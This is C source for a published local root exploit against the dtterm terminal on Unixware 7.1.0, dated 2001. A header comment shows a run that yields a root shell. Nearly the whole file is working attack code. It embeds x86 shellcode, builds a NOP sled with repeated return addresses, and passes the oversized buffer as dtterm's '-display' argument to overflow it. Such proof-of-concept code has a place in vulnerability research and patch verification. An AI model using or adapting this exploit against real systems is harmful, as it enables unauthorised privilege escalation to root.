/*
 *  Unixware 7.1.0 xploit for dtterm 
 *  
 *  By: Fermín J. Serna <fjserna@ngsec.com>
 *      Next Generation Security Technologies
 *      http://www.ngsec.com
 * 
 *  This is not the overflow in CSSA-2001-SCO.26
 *
 * $ pkginfo | grep dtterm
 * patch erg711857 erg711857 - dtterm fix for - dtterm argument buffer overflow
 * $ ./dtterm-x
 * dtterm xploit for Unixware 7.1.0 by Fermín J. Serna <fjserna@ngsec.com>
 * Next Generation Security Technologies http://www.ngsec.com
 * Len: 2066 Return address: 0x804767c
 *
 * # id
 * uid=0(root) gid=0(root)
 *
 *  Madrid 31/12/2001
 *
 */

#include <stdio.h>
#include <string.h>

#define SIZE 2064+3
#define NOP 0x90
#define OFFSET 500
#define NUM_ADDR 8

char shellcode[]= /* zhodiac@softhome.net */
 "\xeb\x17\x5e\x31\xdb\x88\x5e\x07\x89\x5e\x0c\x88\x5e\x11\xb3\x2e"
 "\xfe\xc3\x88\x1e\x88\x5e\x04\xeb\x18\xe8\xe4\xff\xff\xff\x5a\x62"
 "\x69\x6e\x5a\x73\x68\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa"
 "\xc3\x31\xdb\x31\xc0\x53\xb0\x17\xe8\xec\xff\xff\xff\x53\xb0\x2e"
 "\xe8\xe4\xff\xff\xff\xb0\x3b\x53\x53\x56\x56\xeb\xdc";

long get_esp() { __asm__("movl %esp,%eax"); }

int main(int argc, char **argv) {
char buffer[SIZE];
char *ch_ptr;
unsigned long *lg_ptr;
int counter;

 printf("dtterm xploit for Unixware 7.1.0 by Fermín J. Serna <fjserna@ngsec.com>");
 printf("Next Generation Security Technologies http://www.ngsec.com");

 ch_ptr=buffer;
 memset(ch_ptr,NOP,sizeof(buffer)-strlen(shellcode)-NUM_ADDR*4-3);
 ch_ptr+=sizeof(buffer)-strlen(shellcode)-NUM_ADDR*4-3;
 memcpy(ch_ptr,shellcode,strlen(shellcode));
 ch_ptr+=strlen(shellcode);
 lg_ptr=(unsigned long *)ch_ptr;
 for(counter=0;counter<NUM_ADDR;counter++) *(lg_ptr++)=get_esp()+OFFSET;
 ch_ptr=(char *)lg_ptr;
 *(ch_ptr++)=':';
 *(ch_ptr++)='0';
 *(ch_ptr++)='\0';

 printf("Len: %d Return address: %#x\n",strlen(buffer),get_esp()+OFFSET);
 execl("/usr/dt/bin/dtterm","dtterm","-display", buffer, NULL); 

}